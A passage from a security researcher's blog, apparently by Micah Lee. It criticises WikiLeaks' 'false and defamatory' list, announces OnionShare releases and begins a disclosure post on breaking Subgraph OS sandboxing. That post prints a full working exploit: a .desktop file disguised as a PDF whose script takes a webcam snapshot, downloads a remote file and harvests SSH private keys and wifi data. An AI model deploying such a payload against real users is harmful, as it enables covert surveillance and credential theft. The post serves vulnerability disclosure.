<p>In 2012, WikiLeaks published a trove of over two million hacked emails from the Syrian government, called the <a href="https://wikileaks.org/Syria-Files.html">Syria Files</a>. But, according to <a href="https://www.dailydot.com/layer8/wikileaks-syria-files-syria-russia-bank-2-billion/">court records</a> about the hacktivists that breached Syria's computers, obtained by the Daily Dot, WikiLeaks withheld an email from the Syria Files. This email described a €2 billion transaction between the Syrian government and a state-owned Russian bank. It appears that WikiLeaks selectively suppressed this email to avoid implicating the Russian government.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever suppressed materials critical of Israel, Russia or any other State.</em></p>
<p>I'm gonna call this one a lie.</p>
<h3 id="anti-semitism-and-the-far-right">Anti-Semitism and the far right</h3><p>Julian Assange appears to have a problem with Jews. I first noticed when WikiLeaks tweeted this (they've since deleted it):</p>
<p><img src="wikileaks-antisemite1.jpg" alt=""></p>
<p>The parentheses refer to a neo-Nazi meme called "echoes," which identifies Jews online by surrounding their names with three parentheses. In response to the meme, many Jewish people and some allies began to bracket their names on Twitter in a show of solidarity.</p>
<p>Shortly after that tweet, in a private Twitter DM group, WikiLeaks called Jewish investigative journalist Raphael Satter a "rat," after he tweeted an article he wrote for the Associated Press about the harm caused when WikiLeaks publishes private information about individuals. (A member of this Twitter DM group leaked the incredibly revealing messages to me, and I <a href="https://theintercept.com/2018/02/14/julian-assange-wikileaks-election-clinton-trump/">reported</a> on them for The Intercept. You can also see my Twitter thread about these leaked DMs <a href="https://twitter.com/micahflee/status/963852295271104512">here</a>.)</p>
<p><img src="wikileaks-antisemite2.jpg" alt=""></p>
<p>WikiLeaks then instructed its followers to "Bog him down. Get him to show his bias." (Those leaked DMs show a pattern of WikiLeaks leading troll campaigns like this one.)</p>
<p>People used to be able to donate to WikiLeaks using the FPF website, a system we set up in order to bypass the financial censorship that WikiLeaks was facing. But at the end of 2017, after WikiLeaks failed to show us any evidence that the 2010 financial blockade against them was still ongoing, the FPF board of directors <a href="https://freedom.press/news/beyond-blockade/">unanimously voted</a> to take down our WikiLeaks donate button (they could still receive credit card donations through a separate non-profit in Europe). In response, WikiLeaks orchestrated a troll campaign against me personally (I describe it in <a href="https://twitter.com/micahflee/status/948999951853301760">this Twitter thread</a> if you're interested).</p>
<p>As part of the trolling campaign, Assange called us rats, and an official WikiLeaks Twitter account, along with swarms of WikiLeaks fans, piled on, using other anti-Semitic imagery and language.</p>
<p><img src="wikileaks-antisemite3.jpg" alt=""></p>
<p><img src="wikileaks-antisemite4.jpg" alt=""></p>
<p>Nazis and other anti-Semites have a <a href="https://www.theguardian.com/artanddesign/shortcuts/2015/nov/18/rats-the-history-of-an-incendiary-cartoon-trope">long history</a> of calling people they despise, like Jews and immigrants, rats.</p>
<p>And here's another tidbit of evidence of anti-Semitism. In 2014, someone Assange hired to ghostwrite his memoir, who ended up turning down the job, <a href="https://www.lrb.co.uk/v36/n05/andrew-ohagan/ghosting">described</a> bigoted ramblings "in which he’d uttered, late at night, many casual libels, many sexist or anti-Semitic remarks, and where he spoke freely about every aspect of his life."</p>
<p><em>It is false and defamatory to suggest that Julian Assange is an anti-semite.</em></p>
<p>Like many of the things on the "false and defamatory" list, this one is subjective. But, from my perspective, it's pretty clear that he's an anti-Semite.</p>
<p>And that's not all: Assange started showing signs of anti-Semitism long before 2016. In 2013, former WikiLeaks employee James Ball <a href="https://www.thedailybeast.com/exclusive-former-wikileaks-employee-james-ball-describes-working-with-julian-assange">described</a> his falling out with Assange in an article for the Daily Beast:</p>
<blockquote><p>The reason I quit was because of a friend of Julian’s whose activities were unstomachable and unforgivable. That man was Israel Shamir. Shamir is an anti-Semitic writer, a <a href="http://www.counterpunch.org/2010/12/31/the-minsk-election-in-a-wikileaks-mirror/">supporter of the dictator of Belarus</a>, and a man with ties and friends in Russian security services. He and Julian -- unknown to us -- had been in friendly contact for years. It was a friendship that would have serious consequences.</p>
<p>Introduced to WikiLeaks staff and supporters under a false name, Shamir was given direct access to more than 90,000 of the U.S. Embassy cables, covering Russia, all of Eastern Europe, parts of the Middle East, and Israel. This was, for quite some time, denied by WikiLeaks. But that’s never a denial I’ve found convincing: the reason I know he has them is that I gave them to him, at Assange’s orders, not knowing who he was.</p>
<p>Why did this prove to be a grave mistake? Not just for Shamir’s views, which are easy to Google, but for what he did next. The first hints of trouble came through contacts from various Putin-influenced Russian media outlets. A pro-Putin outlet got in touch to say Shamir had been asking for $10,000 for access to the cables. He was selling the material we were working to give away free, to responsible outlets.</p>
<p>Worse was to come. The <a href="http://www.indexoncensorship.org/2011/02/wikileaks-belarus-and-israel-shamir/">NGO Index on Censorship</a> sent a string of questions and some photographic evidence, suggesting Shamir had given the cables to Alexander Lukashenko of Belarus, Europe’s last dictator. Shamir had written a pro-Belarus article, shortly before photos emerged of him leaving the interior ministry. The day after, Belarus’s dictator gave a speech saying he was establishing a WikiLeaks for Belarus, citing some stories and information appearing in the genuine (and then unpublished) cables.</p>
</blockquote>
<p>With that in mind, check out these next items on the WikiLeaks censorship list:</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange shared documents with a dictator.</em></p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks ever employed, or contracted, a holocaust denier.</em></p>
<p>Assuming James Ball is telling the truth, then both of those are lies.</p>
<p>That's still not all. In August 2017, Assange welcomed (now former) pro-Putin Rep. Dana Rohrabacher (R-California) and Holocaust-denying alt-right icon Chuck Johnson to visit him in the Ecuadorian Embassy in London, <a href="https://dailycaller.com/2017/08/16/exclusive-republican-congressman-meets-with-wikileaks-founder-julian-assange/">according to</a> the Daily Caller. They were hoping to negotiate some sort of deal with Trump, but former White House Chief of Staff John Kelly <a href="https://theintercept.com/2018/02/14/dana-rohrabacher-trump-russia-wikileaks-julian-assange/">prevented</a> Rohrabacher from later briefing Trump about the meeting.</p>
<p>After Assange's role in the 2016 election, David Duke, former grand wizard of the Ku Klux Klan, personally <a href="https://twitter.com/DrDavidDuke/status/796263508124037120">thanked</a> Assange.</p>
<p><img src="wikileaks-davidduke.png" alt=""></p>
<p>Assange still, to this day, hasn't disavowed this sort of support from neo-Nazis or members of the KKK.</p>
<p><em>It is false and defamatory to suggest that Julian Assange is “far left” or “far right”.</em></p>
<p>While again, this is subjective and nuanced, "far right" is a fairly accurate description of Assange. Or, at least, "allied with the far right."</p>
<h3 id="perfect-record">Perfect record</h3><p>There's one item on the list that stood out to me because it was actually true.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks does not have a perfect record of accurately verifying its publications.</em></p>
<p>As far as I can tell, WikiLeaks does indeed have a perfect record of publishing real, and often very newsworthy, document sets on their website.</p>
<p>WikiLeaks seems to keep its lies and conspiracy theories off of wikileaks.org (with the exception of our.wikileaks.org). Instead, WikiLeaks prefers to spread its misinformation on Twitter, in interviews, and on rambling screeds posted to Pastebin.</p>
<h4 id="update-january-11-2019">Update January 11, 2019:</h4><p>Someone pointed out a few WikiLeaks conspiracy theory tweets that I didn't know about.</p>
<p>WikiLeaks <a href="https://twitter.com/wikileaks/status/794450623404113920?lang=en">tweeted</a> an article, written by white supremacist and alt-right icon Cassandra Fairbanks, that promoted the "John Podesta engaged in satanic rituals" conspiracy theory, making this item on the censorship list contain at least two lies:</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote alleged conspiracy theories claiming “John Podesta engaged in satanic rituals”, the “Democratic Party had Seth Rich Killed”, “Clinton wore earpieces to the 2016 US election debates”, on “Clinton’s health” or “Clinton kidnapping children”.</em></p>
<p><img src="wikileaks-satanic.png" alt=""></p>
<p>In order to promote the Pizzagate conspiracy, WikiLeaks <a href="https://twitter.com/wikileaks/status/821595404500430848?lang=en">tweeted</a> a Ben Swann video segment (which appears to now be taken down) about Pizzagate.</p>
<p>(Wikipedia <a href="https://en.wikipedia.org/wiki/Ben_Swann">says</a> Swann "created the series, Reality Check, which he used to espouse conspiracy theories, such as Pizzagate, and those surrounding the Aurora, Colorado and Sandy Hook Elementary School shootings and the 9/11 attacks," and, "He was forced by his employer to bring down the internet media channel and most of his social media sites in 2017. He was fired in 2018 from CBS affiliate WGCL-TV in Atlanta, Georgia for pursuing his Reality Check show and alt-right theories, particularly Pizzagate.")</p>
<p>As a bonus, they also included a handy link to an FBI document describing pedophile symbols, for all their Pizzagate followers, which just adds to the lies already discussed above in these items:</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks promoted or invented the “pizzagate” conspiracy theory.</em></p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote a “conspiracy theory”.</em></p>
<p><img src="wikileaks-pizzagate.png" alt=""></p>
<p>WikiLeaks <a href="https://twitter.com/wikileaks/status/782906224937410562">tweeted</a> a report from the right-wing fake news website TruePundit claiming that Hillary Clinton said, "Can't we just drone the guy?" about Assange. But they didn't just tweet it. As the Daily Kos <a href="https://www.dailykos.com/stories/2016/11/2/1590342/--True-Pundit-and-Drone-this-Guy-A-brief-update-from-the-conspiracy-theory-machine-factory">describes</a>, "Heck, Wikileaks tweeted it in monospace font with yellow highlight! That means it’s from some leaked document, right? Well, actually, Wikileaks put text from a right-wing website, TruePundit, in monospace font and highlighted the relevant quote." (Snopes <a href="https://www.snopes.com/fact-check/julian-assange-drone-strike/">says</a> Clinton calling for a drone strike against Assange is "unproven.")</p>
<p>I'm not sure what items on the censorship list this one relates to. But in any case, they clearly don't have a problem with promoting misinformation and fake news if the message is right.</p>
<p><img src="wikileaks-fakenews.png" alt=""></p>
<hr>
<h1 id="do-you-want-to-contribute-to-the-next-major-version-of-onionshare">Do you want to contribute to the next major version of OnionShare?</h1><p><em>By Micah Lee, posted: 2018-12-22</em></p>
<p><a href="https://onionshare.org/">OnionShare</a> lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does <em>not</em> require setting up a separate server or using a third party file-sharing service.</p>
<p>Over the last 10 months volunteer developers, designers, translators, and I have been hard at work on OnionShare 2.0, and it’s nearly ready. If you’d like to chip in during the month or so before the final release, <strong>try out the <a href="https://github.com/micahflee/onionshare/releases/tag/v2.0.dev2">latest development version</a> and report any bugs</strong>. The best way to report bugs is by <a href="https://github.com/micahflee/onionshare/issues/new">opening an issue</a> on GitHub and describing the problem, or you can send me an email at micah@micahflee.com if you don’t have a GitHub account.</p>
<p>And if you are a native speaker of a language other than English, <strong>we can use your help making OnionShare available in your language</strong>. If you’d like to help, check out the <a href="https://github.com/micahflee/onionshare/wiki/Translating">wiki page</a> about translating, and make a <a href="https://hosted.weblate.org/projects/onionshare/translations/">Weblate account</a> to start translating the English strings into your native language. To give translators time to work, we’re waiting about a month to release the final version. (OnionShare has supported multiple languages for a long time, but only in an unusable, half-assed kind of way. If you used a non-English language, only about 30% of OnionShare would appear in your language (if it was supported at all), and the rest was just displayed in English. The translation workflow was really bad: translators, many of whom aren’t programmers, had to submit pull requests on GitHub. It’s much better now.)</p>
<p>This version of OnionShare is loaded with new features. I’ll go into them all in more detail once it’s finally released, but here’s what you should know about a few of them.</p>
<p><strong>Receive mode:</strong> Instead of just using OnionShare to send files to others, you can now use it as an anonymous dropbox of your own. Open OnionShare, switch to the “Receive Files” tab, and click start. After it finishes creating a Tor onion service, give the URL to other people. When they load it in Tor Browser, they’ll be able to <em>upload</em> files directly to your computer. (Be careful: all the same warnings about malicious email attachments apply here. Don’t open random files from strangers unless you know what you’re doing, because they could try to hack your computer.)</p>
<p><strong>Support for next generation (v3) onion services:</strong> OnionShare 2.0 finally supports the <strong>new, more secure type of Tor onion services</strong>. This was tricky to get working, and it actually involved discovering two separate bugs in upstream Tor (<a href="https://trac.torproject.org/projects/tor/ticket/25552">this</a> and <a href="https://trac.torproject.org/projects/tor/ticket/28619">this</a>). v3 onion services are only supported if you’re using the very latest development release of Tor. The Windows and Mac versions of OnionShare 2.0 will bundle a version of Tor that supports them. If you want to try them in this dev release, you’ll need to configure OnionShare to connect to a <a href="https://github.com/micahflee/onionshare/wiki/Connecting-to-Tor#using-a-system-tor-in-linux">system Tor</a> and install at least Tor 0.4.0.0, which users of Debian-like distros can get from the Tor nightly-master <a href="https://www.torproject.org/docs/debian.html.en">repository</a>.</p>
<p>The final version of OnionShare 2.0 will probably be released in late January or early February 2019.</p>
<p><img src="onionshare-receive-client.png" alt="OnionShare's new receive mode feature"></p>
<hr>
<h1 id="onionshare-has-some-exciting-new-features">OnionShare has some exciting new features</h1><p><em>By Micah Lee, posted: 2018-02-26</em></p>
<p>It’s been some time since I’ve written about OnionShare, so I thought I’d write an update on all of the latest work. Today we released version 1.3 (and last month we released 1.2, so the releases are getting more frequent). You can get the latest version at onionshare.org.</p>
<p>But first, I owe a huge thanks to <a href="https://twitter.com/_mig5">Miguel Jacq</a> for churning out new features, taking over a lot of the GitHub issue triaging responsibilities, and becoming a core OnionShare developer.</p>
<p>If you haven’t tried it out in awhile, here are some things that are new:</p>
<p>The user interface has a <em>major</em> upgrade. It’s now much more clear exactly what steps you’re supposed to take at every point, and it looks a bit more like a modern piece of software. In addition to the OnionShare interface getting redesigned, the client-side web interface — what people receiving the files with Tor Browser see — also has a new look:</p>
<p><img src="onionshare-client.png" alt=""></p>
<p>(That’s Tor Browser running in a disposable Whonix AppVM in Qubes, by the way.)</p>
<p>I owe a huge thanks to <a href="https://keybase.io/glennsorrentino">Glenn Sorrentino</a> for, nine months ago, doing a formal user study of OnionShare users and designing a brand new user experience that only now, in version 1.3, is seeing the light of day. Glenn also redesigned the onionshare.org website!</p>
<p>OnionShare now bundles a copy of Tor with it (and has since May 2017), which means there’s no need to have Tor Browser open in the background anymore. Instead, OnionShare connects to Tor itself.</p>
<p><img src="onionshare-bundled-tor.png" alt=""></p>
<p>Because OnionShare can now control its own Tor process, it’s now also possible for censored users in countries like China to connect to the Tor network using bridges, from within OnionShare. Bridge support was first added last month, and support for meek bridges was added to 1.3 (for Linux only at the moment).</p>
<p><img src="onionshare-bridges.png" alt=""></p>
<p>Here’s more information about <a href="https://github.com/micahflee/onionshare/wiki/Connecting-to-Tor">connecting to Tor</a> and <a href="https://github.com/micahflee/onionshare/wiki/Using-Bridges">using bridges</a> in OnionShare.</p>
<p>Another recent feature is the auto-stop timer. Already, OnionShare will stop the share as soon as the first download finishes (you can disable this in the settings if you want to send files to multiple people). But now, if the receiver doesn’t download the file within a specified amount of time, OnionShare will automatically stop sharing for you. For example, here I’m sharing a screenshot, but the share will automatically stop at 2pm:</p>
<p><img src="onionshare-autostop1.png" alt=""></p>
<p>Once you start the share, you can see a countdown of seconds remaining before it stops on its own. (If the receiver starts downloading before that countdown finishes though, they’ll be able to finish downloading all the files no matter how long the download takes.)</p>
<p><img src="onionshare-autostop2.png" alt=""></p>
<p>Here’s more information about <a href="https://github.com/micahflee/onionshare/wiki/Using-the-Auto-Stop-Timer">using the auto-stop timer</a>.</p>
<p>Another feature is persistent OnionShare addresses. By default, every time you share something, OnionShare generates a brand new URL, and as soon as you’re done sharing, that URL no longer exists and never will again. But now, you can change a setting that will allow you to re-use the same OnionShare URL for multiple shares.</p>
<p>This might come in handy in any situation where you want to send someone files, but you don’t want to have any online communication channel with them. For example, let’s say a whistleblower (Alice) meets a journalist (Bob) in person. Alice can hand Bob a piece of paper with an OnionShare address on it and tell him to check it every night at a specific time. Now, Alice can continually anonymously send files to Bob without needing to communicate new OnionShare addresses every time. Here’s more information about <a href="https://github.com/micahflee/onionshare/wiki/Using-a-Persistent-URL">persistent addresses</a>.</p>
<p>Another advanced feature that’s been added is support for stealth, or authenticated, onion services. These are Tor onion services that are much more private, but are also harder to use. The sender needs to share not just the OnionShare address but also a HidServAuth string, and the receiver needs to add this HidServAuth string to their torrc file before they’ll be able to connect to it. (This is why it’s an advanced feature: it’s not quite practical for beginners to do this without a lot of troubleshooting.) Here’s more information about using <a href="https://github.com/micahflee/onionshare/wiki/Stealth-Onion-Services">stealth onions</a> in OnionShare.</p>
<p>On a similar note, you might be wondering about OnionShare support for next generation Tor onion services, which are more secure and private than existing onion services. There is an <a href="https://github.com/micahflee/onionshare/issues/461">open issue</a> for this, but currently it’s blocked until an upstream project that OnionShare relies on, <a href="https://stem.torproject.org/">stem</a>, adds support for ephemeral next gen onion services itself. However, the OnionShare website itself is now accessible using a next gen onion service, and OnionShare will load it to check for available updates:</p>
<pre><code>http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/
</code></pre>
<p>I’ve described some of the newest and biggest features in OnionShare, but this is not nearly an exhaustive list. There are many more, including a system tray icon with desktop notifications, the ability to cancel shares before they finish starting, translations into several languages, and automatic update checking. Oh, and since January 2017, OnionShare has been <a href="https://tails.boum.org/doc/anonymous_internet/onionshare/index.en.html">built into the Tails operating system</a> too!</p>
<p>I’m striving to make OnionShare a contributor-friendly open source project. Pull requests are always welcome, and in fact <a href="https://github.com/micahflee/onionshare/graphs/contributors">51 different people</a> have already contributed code.</p>
<p>If you’d like to get involved in OnionShare development:</p>
<ul>
<li>Read the <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">Developing OnionShare</a> page on the wiki</li>
<li>Join the new (and so far extremely low-traffic) <a href="https://lists.riseup.net/www/subscribe/onionshare-dev">mailing list</a> for OnionShare developers and designers</li>
<li>Check out the GitHub <a href="https://github.com/micahflee/onionshare/issues">issues page</a> for bugs or enhancements to work on, or open your own issues if there are features you’d like to develop</li>
</ul>
<hr>
<h1 id="breaking-the-security-model-of-subgraph-os">Breaking the Security Model of Subgraph OS</h1><p><em>By Micah Lee, posted: 2017-04-11</em></p>
<p>I recently traveled to Amsterdam to attend a meeting with Tor Project staff, volunteers, and other members of the wider Tor community. Before trips like this, I prepare a separate travel computer, only bringing with me data and credentials that I might need during my trip. My primary laptop runs <a href="https://www.qubes-os.org/">Qubes</a>, but this time I decided to install <a href="https://subgraph.com/sgos/index.en.html">Subgraph OS</a> on my travel laptop. I had only briefly messed with it before, and there’s no better way to learn about a new operating system than by forcing yourself to actually use it for a few days.</p>
<p>Subgraph OS is an “adversary resistant computing platform.” It’s similar to <a href="https://tails.boum.org/">Tails</a> in that it’s based on Debian and all traffic is forced through Tor (that’s changing though: there’s now basic support for <a href="https://subgraph.com/sgos/documentation/clearnet-chromium/">clearnet Chromium</a> and <a href="https://twitter.com/subgraph/status/846455144648785921">OpenVPN</a>). It uses a grsecurity Linux kernel, and many apps run in “oz sandboxes”, a homebrew sandbox solution that protects you even if an attacker manages to exploit a bug in one of these apps. Subgraph OS also includes the Subgraph Firewall, an application firewall similar to Little Snitch for macOS — something that’s pretty awesome, and hasn’t really existed in the Linux ecosystem before. Basically, it’s designed to be an easy-to-use Linux distro that’s extremely secure.</p>
<p>Joanna Rutkowska, the brains behind Qubes, was at the Tor meeting as well. We sat down together and started poking at Subgraph OS to see if we could break its security model, and we succeeded! After we discovered weaknesses, I polished them into a working exploit.</p>
<iframe src="https://www.youtube-nocookie.com/embed/SVsllZ7g7-I?rel=0" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe><p>Subgraph publishes a user manual called the Subgraph OS Handbook. You can find the code for it <a href="https://github.com/subgraph/sgos_handbook">on GitHub</a>. I made a fake website with a link to download this git repository, compressed as a zip file. A realistic targeted attack would probably use different bait — perhaps an attacker would send a journalist some juicy documents — but the point is, the user downloads something from a website, or maybe from their email, and then double-clicks a document to open it. Subgraph OS, with its grsecurity Linux kernel and oz sandboxes, is supposed to prevent malicious documents from taking over your computer, but in this case it doesn’t.</p>
<p>I reported what we found to the Subgraph developers and offered to give them time to resolve the issues before I published this post. They said that none of what I reported was surprising, that Subgraph OS is still in alpha, and that they don’t recommend that people use it yet. But that’s funny, because <a href="https://archive.is/A1OCP">their website</a> doesn’t seem to include that warning — it describes a list of amazing security features, ending with, “Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live-disk, or use it in a VM.”</p>
<p>They didn’t ask for more time, and they haven’t resolved the issues yet.</p>
<p>To be fair, Subgraph OS <em>is</em> still in alpha, and already it’s more secure by default than many other Linux distros. This same attack also works against Tails, Debian, Ubuntu, Fedora, Arch, etc. (not Qubes though).</p>
<p><strong>How oz sandboxing works</strong></p>
<p>Subgraph comes with sandboxes for 22 applications — things like Tor Browser, OnionShare, Evince (PDF reader), Eye of GNOME (image viewer), Icedove (email client), and VLC (media player). If you run a program that doesn’t have an oz sandbox (such as Nautilus, the built-in file manager, or anything that isn’t one of those 22 programs), then it runs unsandboxed, with access to all your user data.</p>
<p>If you open a malicious PDF that exploits a bug in Evince, the sandbox will limit what the attacker can do. It blocks internet access, so the attacker can’t phone home. It restricts the Linux system calls that can be made to only those that Evince needs to work. It limits access to the filesystem. On a normal Linux computer, if an attacker hacks Evince, they can access all of the user’s data in their home directory (documents, email, PGP and SSH keys, etc.), but the Evince oz sandbox prevents the attacker from accessing any documents except the one that the user opened.</p>
<p>Oz sandboxes themselves seem pretty good at a glance, though I did find some information leakage: <code>/etc</code> is readable from within the sandbox. So if you run <code>ls /etc/NetworkManager/system-connections</code>, you can see a list of the computer’s saved wifi networks, even inside the sandbox. In oz sandboxes that allow internet access (like the Tor Browser one), this information could be sent back to the attacker — there’s likely other juicy data in there too. When I reported this, the Subgraph devs pointed me to <a href="https://github.com/subgraph/oz/issues/20">this year-old github issue</a>, showing that they’ve thought about it.</p>
<p><strong>The problem with Subgraph OS’s sandbox approach</strong></p>
<p>Oz sandboxes are similar to <a href="https://developer.apple.com/library/content/documentation/Security/Conceptual/AppSandboxDesignGuide/AboutAppSandbox/AboutAppSandbox.html">macOS app sandboxes</a> — they lock down what specific apps can do so that if those apps get hacked, the attacker is hopefully stuck in the sandbox with very limited access. While this is great, it’s an incomplete solution to endpoint security.</p>
<p>For one thing, most of the programs you run in Subgraph <em>aren’t</em> sandboxed. Most of GNOME isn’t. Nautilus, the graphical file manager, isn’t, and neither is the terminal app. If an attacker can trick a user into running an unsandboxed script in either Nautilus (what my attack does) or in the terminal, it’s game over. If the user installs custom software that doesn’t have an oz profile, and an attacker exploits this software, it’s also game over.</p>
<p>An attacker that gets unsandboxed remote code execution in Subgraph OS has a lot of access. They can see, and exfiltrate, all of the user’s data: PGP keys, SSH keys, stored email, documents, password databases, and everything else. They can listen through the microphone and watch through the webcam. They can learn the network interface’s MAC address, and see nearby wifi access points and bluetooth devices, which can be used to deanonymize the user. And they can install a persistent backdoor on the user’s computer.</p>
<p>For another, there’s no way to compartmentalize different parts of your computer for different purposes like you can in Qubes. You can’t make a separate sandbox for working with some untrusted documents, or for keeping certain secrets extra secure, or for managing different anonymous identities online. All of your data in Subgraph OS, at some point, risks getting accessed by unsandboxed programs.</p>
<p>I won’t go into detail about how Qubes does it except to say that it’s a somewhat opposite approach. You have a thin, unsandboxed layer that has total control over your computer, and then <em>everything</em> else is run inside of sandboxes. Qubes also protects sandboxed apps from reading potentially sensitive data off of your clipboard (unless you want it to), and it protects your administrative domain from untrusted input coming from your network drivers and your USB stack. (It’s the only operating system that I’m aware of that, out-of-the-box, protects against BadUSB attacks.)</p>
<p><strong>Hacking the Free Desktop with .desktop files</strong></p>
<p>In the free desktop world, application launchers are .desktop files. Every GUI application on your Linux box has a desktop file; just check <code>/usr/share/applications</code>. If you’re creating a custom application launcher, inside the .desktop file you specify the name of the application, an icon, and the command to run when you execute it.</p>
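<p>For illustration, here’s what a minimal launcher looks like (a made-up example, not one that ships with any distro):</p>

```ini
[Desktop Entry]
Type=Application
Name=Hello
Icon=utilities-terminal
Exec=sh -c 'echo hello'
```

<p>When executed, the file manager runs the <code>Exec=</code> command; the <code>Name=</code> and <code>Icon=</code> fields only control how the file is displayed.</p>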
<p>If you open Nautilus and browse to a folder with a .desktop file in it, there are two ways it can get displayed.</p>
<ul>
<li>If the file isn’t executable, Nautilus doesn’t trust it and shows the full original filename, including the .desktop extension, and a default icon.</li>
<li>If the file is executable, Nautilus trusts it and shows whatever name and icon is specified in the file. This is why the exploit I built was zipped up, so I could ensure that my malicious .desktop file is executable.</li>
</ul>
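<p>That trust decision boils down to a small check. Here’s a rough sketch of the logic in shell (illustrative only, not Nautilus’s actual implementation; <code>displayed_name</code> is a made-up helper name):</p>

```shell
# Sketch of the display logic described above: an executable .desktop file
# is "trusted" and shown under its embedded Name= value; a non-executable
# one is shown under its real filename, extension and all.
displayed_name() {
  f="$1"
  case "$f" in
    *.desktop)
      if [ -x "$f" ]; then
        # Trusted: print the Name= value from the file
        sed -n 's/^Name=//p' "$f" | head -n1
        return
      fi
      ;;
  esac
  # Untrusted (or not a launcher): print the real filename
  basename "$f"
}
```

So the same file flips from looking like <code>sgos_handbook.pdf.desktop</code> to looking like <code>sgos_handbook.pdf</code> the moment the executable bit is set.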
<p>It’s important to note that this is a <em>huge gaping security hole in Nautilus</em>. All Linux users that use Nautilus (including everyone who uses GNOME, Unity, Cinnamon) are vulnerable to getting tricked this way. This bug was <a href="https://bugzilla.gnome.org/show_bug.cgi?id=777991">reported to Nautilus</a> in January, and it has now been resolved (by, I believe, popping up a warning asking if you trust the source of the desktop launcher before executing it), but the fix won’t be released until Nautilus 3.24.</p>
<p>Debian Stretch ships 3.22.3; Fedora 25 ships 3.22.2; Ubuntu 16.10 ships 3.20.3; Ubuntu 17.04 ships 3.20.4. So it might be some time before this fix actually makes it into distros that people use. The Subgraph devs pointed me to <a href="https://github.com/subgraph/subgraph-os-issues/issues/227">this recent github issue</a>, showing that they’ve thought about this issue too. They also said they’re planning on auditing the Nautilus source code.</p>
<p>The exploit I created is a file called <code>sgos_handbook.pdf.desktop</code> (though I could have named it <code>malware.desktop</code> and it would have looked the same in Nautilus). Here’s what’s inside of it. Note that the name is set to <code>sgos_handbook.pdf</code>, and the icon is <code>gnome-mime-application-pdf</code> which is the default icon for PDFs in Subgraph — these two things make it so you can’t tell that this isn’t a PDF when viewing it in Nautilus. Also, of course, note that it’s set to execute a malicious shell script when it’s run.</p>
<pre><code>#!/usr/bin/env xdg-open
[Desktop Entry]
Encoding=UTF-8
Name=sgos_handbook.pdf
Exec=sh -c 'ROOT=$(dirname $(dirname $(find $HOME -type f -name sgos_handbook.pdf.desktop)) |head -n1); evince $ROOT/static/sgos_handbook.pdf; mkdir $HOME/.config/tools; cd $HOME/.config/tools; torify apt download fswebcam; dpkg-deb -xv `ls fswebcam_*.deb` .; ./usr/bin/fswebcam -r 640x480 $HOME/webcam-snapshot.jpg; torify wget https://static.wixstatic.com/media/6a4a49_4e03bc224328475ea2e20dddaf9d0fda~mv2_d_2121_1414_s_2.jpg -O $HOME/attacker-can-drop-files-from-the-internet.jpg; echo "ifconfig output:" >> $HOME/pwnlog.txt; /sbin/ifconfig >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "tor exit node info:" >> $HOME/pwnlog.txt; torify curl https://ifconfig.co/json >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "ssh public and secret keys:" >> $HOME/pwnlog.txt; cat $HOME/.ssh/id_rsa.pub >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; cat $HOME/.ssh/id_rsa >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "nearby wifi:" >> $HOME/pwnlog.txt; /sbin/iwlist $INTERFACE scan >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt; echo "saved wifi networks:" >> $HOME/pwnlog.txt; ls /etc/NetworkManager/system-connections >> $HOME/pwnlog.txt; echo >> $HOME/pwnlog.txt;'
Terminal=false
Type=Application
Icon=gnome-mime-application-pdf
</code></pre>
<p>Here’s a more human-readable, and commented, version of the payload:</p>
<pre><code>#!/bin/sh
# Find the location of the extracted sgos_handbook folder
ROOT=$(dirname $(dirname $(find $HOME -type f -name sgos_handbook.pdf.desktop)) |head -n1);
# Open the actual PDF in an oz sandbox
evince $ROOT/static/sgos_handbook.pdf;
# Take a snapshot from the webcam
mkdir $HOME/.config/tools;
cd $HOME/.config/tools;
torify apt download fswebcam;
dpkg-deb -xv `ls fswebcam_*.deb` .;
./usr/bin/fswebcam -r 640x480 $HOME/webcam-snapshot.jpg;
# Download an image to the home directory
torify wget https://static.wixstatic.com/media/6a4a49_4e03bc224328475ea2e20dddaf9d0fda~mv2_d_2121_1414_s_2.jpg -O $HOME/attacker-can-drop-files-from-the-internet.jpg;
# Log the ifconfig output, which includes the MAC address
echo "ifconfig output:" >> $HOME/pwnlog.txt;
/sbin/ifconfig >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log information about the current Tor exit node
echo "tor exit node info:" >> $HOME/pwnlog.txt;
torify curl https://ifconfig.co/json >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log SSH public and secret keys
echo "ssh public and secret keys:" >> $HOME/pwnlog.txt;
cat $HOME/.ssh/id_rsa.pub >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
cat $HOME/.ssh/id_rsa >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log scan of nearby wifi networks
echo "nearby wifi:" >> $HOME/pwnlog.txt;
/sbin/iwlist $INTERFACE scan >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log list of saved wifi networks
echo "saved wifi networks:" >> $HOME/pwnlog.txt;
ls /etc/NetworkManager/system-connections >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
</code></pre>
<p><strong>Using .desktop Files to Break Out of a Sandbox</strong></p>
